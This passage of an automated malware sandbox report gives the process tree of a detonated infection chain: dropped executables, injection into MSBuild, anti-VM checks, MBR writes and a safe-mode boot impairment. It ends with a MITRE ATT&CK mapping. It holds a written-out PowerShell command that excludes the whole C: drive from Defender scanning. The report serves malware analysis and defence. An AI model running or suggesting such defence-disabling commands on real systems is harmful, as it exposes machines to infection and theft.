        Suspicious use of FindShellTrayWindow
        
        PID:2888
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:4244
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:1008
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:5724
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:7884
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:6344
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:6824
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:8608
      - C:\Users\Admin\AppData\Local\Temp\10480910101\DgQBvwg.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10480910101\DgQBvwg.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:2836
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\epds5nbj\epds5nbj.cmdline"
        7⤵
        
        PID:1052
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5F80.tmp" "c:\Users\Admin\AppData\Local\Temp\epds5nbj\CSCD457F3A6121541758328563B766ABCF6.TMP"
        8⤵
        
        PID:4776
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:3432
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4144
      - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10481850271\ArFLIYD.msi" /quiet
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4580
      - C:\Users\Admin\AppData\Local\Temp\10491450101\5LlBAvp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10491450101\5LlBAvp.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4688
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3656
      - C:\Users\Admin\AppData\Local\Temp\10491470101\YSdglTu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10491470101\YSdglTu.exe"
        6⤵
        Executes dropped EXE
        
        PID:5816
        
        C:\Users\Admin\AppData\Local\Temp\10491470101\YSdglTu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10491470101\YSdglTu.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2256
      - C:\Users\Admin\AppData\Local\Temp\10491920101\Pgpx359.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10491920101\Pgpx359.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4952
      - C:\Users\Admin\AppData\Local\Temp\10491950101\e9ff9c3a5a.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10491950101\e9ff9c3a5a.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6028
      - C:\Users\Admin\AppData\Local\Temp\10491960101\a31e3b2417.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10491960101\a31e3b2417.exe"
        6⤵
        Executes dropped EXE
        
        PID:1196
      - C:\Users\Admin\AppData\Local\Temp\10491970101\10f280b706.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10491970101\10f280b706.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:5428
      - C:\Users\Admin\AppData\Local\Temp\10491980101\Pgpx359.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10491980101\Pgpx359.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6096
      - C:\Users\Admin\AppData\Local\Temp\10491990101\YSdglTu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10491990101\YSdglTu.exe"
        6⤵
        Executes dropped EXE
        
        PID:5588
        
        C:\Users\Admin\AppData\Local\Temp\10491990101\YSdglTu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10491990101\YSdglTu.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:392
      - C:\Users\Admin\AppData\Local\Temp\10492000101\5LlBAvp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10492000101\5LlBAvp.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5728
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4544
      - C:\Users\Admin\AppData\Local\Temp\10492010101\ibC8xs1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10492010101\ibC8xs1.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        
        PID:4584
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yweaj5ti\yweaj5ti.cmdline"
        7⤵
        
        PID:4768
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4C32.tmp" "c:\Users\Admin\AppData\Local\Temp\yweaj5ti\CSCFCC3A98BC67C4C3AB439748E47B3BDDC.TMP"
        8⤵
        
        PID:4116
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3704
      - C:\Users\Admin\AppData\Local\Temp\10492020101\DgQBvwg.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10492020101\DgQBvwg.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        
        PID:5556
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\13ccdy5m\13ccdy5m.cmdline"
        7⤵
        
        PID:6136
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5C30.tmp" "c:\Users\Admin\AppData\Local\Temp\13ccdy5m\CSC6652D1F6AE054734A6D466CC6824DE.TMP"
        8⤵
        
        PID:6124
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5528
      - C:\Users\Admin\AppData\Local\Temp\10492030101\UZPt0hR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10492030101\UZPt0hR.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:5984
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        
        PID:3304
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1424
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        7⤵
        Downloads MZ/PE file
        Adds Run key to start application
        
        PID:2780
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        8⤵
        Executes dropped EXE
        
        PID:6116
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        8⤵
        Deletes itself
        Executes dropped EXE
        
        PID:5520
        
        C:\Users\Admin\AppData\Local\Temp\{13c64baf-8662-484a-a650-0957176873d4}\65086ede.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{13c64baf-8662-484a-a650-0957176873d4}\65086ede.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        9⤵
        Executes dropped EXE
        Checks for VirtualBox DLLs, possible anti-VM trick
        System Location Discovery: System Language Discovery
        
        PID:9280
        
        C:\Users\Admin\AppData\Local\Temp\{9983d2eb-b721-416b-8761-8fdc56014a69}\dfe9b371.exe
        
        C:/Users/Admin/AppData/Local/Temp/{9983d2eb-b721-416b-8761-8fdc56014a69}/\dfe9b371.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        10⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Impair Defenses: Safe Mode Boot
        Loads dropped DLL
        Adds Run key to start application
        Writes to the Master Boot Record (MBR)
        Checks for VirtualBox DLLs, possible anti-VM trick
        System Location Discovery: System Language Discovery
        Suspicious behavior: LoadsDriver
        
        PID:5428
      - C:\Users\Admin\AppData\Local\Temp\10492040101\larBxd7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10492040101\larBxd7.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:14176
      - C:\Users\Admin\AppData\Local\Temp\10492050101\72795d1f06.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10492050101\72795d1f06.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Writes to the Master Boot Record (MBR)
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:6540
      - C:\Users\Admin\AppData\Local\Temp\10492060101\9sWdA2p.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10492060101\9sWdA2p.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:7116
      - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10492070271\ArFLIYD.msi" /quiet
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5640
      - C:\Users\Admin\AppData\Local\Temp\10492080101\AfkeY2q.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10492080101\AfkeY2q.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:11044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:1892
- C:\Windows\explorer.exe
  explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  2⤵
  PID:980

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:392
- C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  "C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1272
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0wxwmv22\0wxwmv22.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1416
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES266F.tmp" "c:\Users\Admin\AppData\Local\Temp\0wxwmv22\CSC255BE67223D74B7695ED876B31CCE21.TMP"
      4⤵
      PID:548
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:888
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
1⤵
PID:1208
- C:\Windows\explorer.exe
  explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  2⤵
  PID:3236

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:3152
- C:\Users\Admin\AppData\Local\Insulin\steamerrorreporter.exe
  "C:\Users\Admin\AppData\Local\Insulin\steamerrorreporter.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:1008
- - C:\Users\Admin\AppData\Roaming\Servicemon\steamerrorreporter.exe
    C:\Users\Admin\AppData\Roaming\Servicemon\steamerrorreporter.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    PID:4420
  - - C:\Users\Admin\AppData\Local\Temp\remoteBggbv2.exe
      C:\Users\Admin\AppData\Local\Temp\remoteBggbv2.exe
      4⤵
      Loads dropped DLL
      PID:4084
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd.exe
      4⤵
      System Location Discovery: System Language Discovery
      PID:5248
- C:\Users\Admin\AppData\Local\Insulin\steamerrorreporter.exe
  "C:\Users\Admin\AppData\Local\Insulin\steamerrorreporter.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2732
- - C:\Users\Admin\AppData\Roaming\Servicemon\steamerrorreporter.exe
    C:\Users\Admin\AppData\Roaming\Servicemon\steamerrorreporter.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:9032

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
PID:4156
- C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  "C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4616
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pexoxxs1\pexoxxs1.cmdline"
    3⤵
    PID:5028
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3236
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7819.tmp" "c:\Users\Admin\AppData\Local\Temp\pexoxxs1\CSCCBE2B6E3F4BD4614A1B71E7A59A1636B.TMP"
      4⤵
      PID:4952
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:1200
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3080

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:1508

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:4988

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
1⤵
PID:3008
- C:\Windows\explorer.exe
  explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  2⤵
  PID:5256

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
PID:5276
- C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  "C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3088
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\keo0zyvl\keo0zyvl.cmdline"
    3⤵
    PID:4608
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES573E.tmp" "c:\Users\Admin\AppData\Local\Temp\keo0zyvl\CSCD5957FF8AD664E308AE04D6B2FF14B22.TMP"
      4⤵
      PID:3924
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
1⤵
PID:5696
- C:\Windows\explorer.exe
  explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  2⤵
  PID:3544

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
PID:5368
- C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  "C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5692
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\auoxkrg0\auoxkrg0.cmdline"
    3⤵
    PID:1236
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6EAE.tmp" "c:\Users\Admin\AppData\Local\Temp\auoxkrg0\CSCB2A8A9003624102986E42DE5623F633.TMP"
      4⤵
      PID:5572
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:6096
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:3676
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:5608
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:1504
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:3640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:5960

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:13840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{ad191732-16cd-4bbe-8b10-aeb710ea48c9}\22673f59-a95e-41d9-b9a7-ef07a0444460.cmd"ÿ
1⤵
PID:10836

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Modify Authentication Process

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Safe Mode Boot

T1562.009

Modify Authentication Process

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion